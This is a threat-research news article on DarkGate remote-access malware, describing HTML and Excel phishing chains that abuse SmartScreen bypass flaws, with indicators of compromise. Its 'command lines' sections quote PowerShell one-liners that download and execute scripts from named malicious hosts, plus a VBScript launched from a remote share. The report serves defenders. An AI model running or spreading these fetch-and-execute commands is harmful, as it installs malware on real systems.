Researchers have uncovered a novel infection chain associated with the DarkGate malware.
This Remote Access Trojan (RAT), developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018.
The DarkGate malware boasts an array of functionalities, including process injection, file download and execution, data theft, shell command execution, and keylogging capabilities.
The researchers have observed a concerning increase in the spread of DarkGate over the past three months, with a significant global presence, as depicted in the following figure:
Bypassing Microsoft Defender SmartScreen
One of the key findings of the investigation is that the DarkGate malware can circumvent detection by Microsoft Defender SmartScreen.
This evasion tactic prompted Microsoft to release a patch to address the underlying vulnerability, CVE-2023-36025, which had been identified and patched in the previous year.
The vulnerability arose from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files.
Cyber adversaries exploited this flaw by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen, as per a report by McAfee.
Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide
Similarly, this year, the researchers have identified another vulnerability, CVE-2024-21412, which also allowed for the bypass of the security feature in Internet Shortcut Files.
Microsoft has since released a patch to address this issue.
Infection Chains Unveiled
The researchers have identified two distinct initial vectors carrying identical DarkGate shellcode and payload.
The first vector originates from an HTML file, while the second begins with an XLS file.
Let’s delve into each chain individually to unveil their respective mechanisms.
Infection from HTML
The infection chain initiates with a phishing HTML page masquerading as a Word document.
Users are prompted to open the document in “Cloud View,” creating a deceptive lure for unwitting individuals to interact with malicious content.
Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.
The researchers discovered that the HTML file contained a JavaScript function designed to reverse strings, suggesting an attempt to decode or manipulate encoded data.
Upon further investigation, they found that the highlighted content in the image was a string encoded in reverse Base64 format.
Decoding the content revealed a URL that utilized the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”.
The “crumb” parameter was employed to confine the search within the context of the malicious WebDAV share, restricting its scope.
The .url file contained a URL parameter that pointed to a VBScript file, which would be automatically executed upon the .url file’s execution.
This process allowed for executing malicious commands or actions on the system, exploiting the CVE-2023-36025 vulnerability.
The researchers observed that the VBScript file would execute a PowerShell command to fetch a script from a remote location and execute it.
Integrate ANY.RUN in Your Company for Effective Malware Analysis
Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:
- Real-time Detection
- Interactive Malware Analysis
- Easy to Learn by New Security Team members
- Get detailed reports with maximum data
- Set Up Virtual Machine in Linux & all Windows OS Versions
- Interact with Malware Safely
If you want to test all these features now with completely free access to the sandbox:
This script would then proceed to download and execute the AutoHotkey utility, along with a malicious script, ultimately leading to the execution of the DarkGate payload.
Following are the command lines:
- “C:WindowsSystem32WScript.exe” “C:UsersadminAppDataLocalMicrosoftWindowsINetCacheIEU4IRGC29Report-26-2024[1].vbs”
- “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)
- ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
- “C:rjtuAutoHotkey.exe” C:/rjtu/script.ahk
- “C:Windowssystem32attrib.exe” +h C:/rjtu/
- “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)
Infection from XLS
The second infection vector originates from a malicious Excel (XLS) file.
When the user clicks the “Open” button, a warning prompt appears before the file is opened.
Upon allowing the activity, the researchers observed a similar process tree to the HTML-based infection chain, with the Excel file executing a VBScript file downloaded from a remote location.
The command lines are:
- “C:Program FilesMicrosoft OfficeRootOffice16EXCEL.EXE” “C:UsersadminDocumentsCluster10-apr-xls1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”
- “C:WindowsSystem32WScript.exe” “\45.89.53.187sMS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”
- “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)
- ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
- “C:kadyAutoHotkey.exe” C:/kady/script.ahk
- “C:Windowssystem32attrib.exe” +h C:/kady/
- “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)
- “C:WindowsSystem32WScript.exe” “\45.89.53.187sMS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”
The remote script downloaded and executed the same set of files, including the AutoHotkey utility and a malicious script, ultimately executing the DarkGate payload.
Persistence and Exfiltration
To maintain persistence, the malware drops a .lnk file in the startup folder, which in turn drops a folder named “hakeede” in the “C:ProgramData” directory.
This folder contains the same set of files, including the AutoHotkey script, executed to run the DarkGate payload.
The researchers also identified data exfiltration to the IP address 5.252.177.207, as shown in the network communication analysis.
The DarkGate malware’s sophisticated infection chain, leveraging vulnerabilities in Microsoft Defender SmartScreen and the AutoHotkey utility, highlights the evolving tactics employed by cybercriminals.
The researchers’ findings underscore the importance of keeping systems up-to-date with the latest security patches and maintaining vigilance against emerging threats.
As the cybersecurity landscape evolves, individuals and organizations must remain informed and proactive in their defense strategies.
By understanding the techniques malware use, like DarkGate, security professionals can develop more effective countermeasures and better protect against such complex and persistent threats.
Indicators of Compromise (IoCs):
| File | Hash |
| Html file | 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005 |
| URL file | 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833 |
| VBS | 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907 |
| autohotkey.exe | 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb |
| AHK script | dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455 |
| test.txt | 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795 |
| DarkGate exe | 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031 |
| IP | 5.252.177.207 |
| XLS file | 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4 |
| VBS | 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f |
| LNK file | 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e |
| IP | 103.124.106.237 |
Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training -> Try Free Demo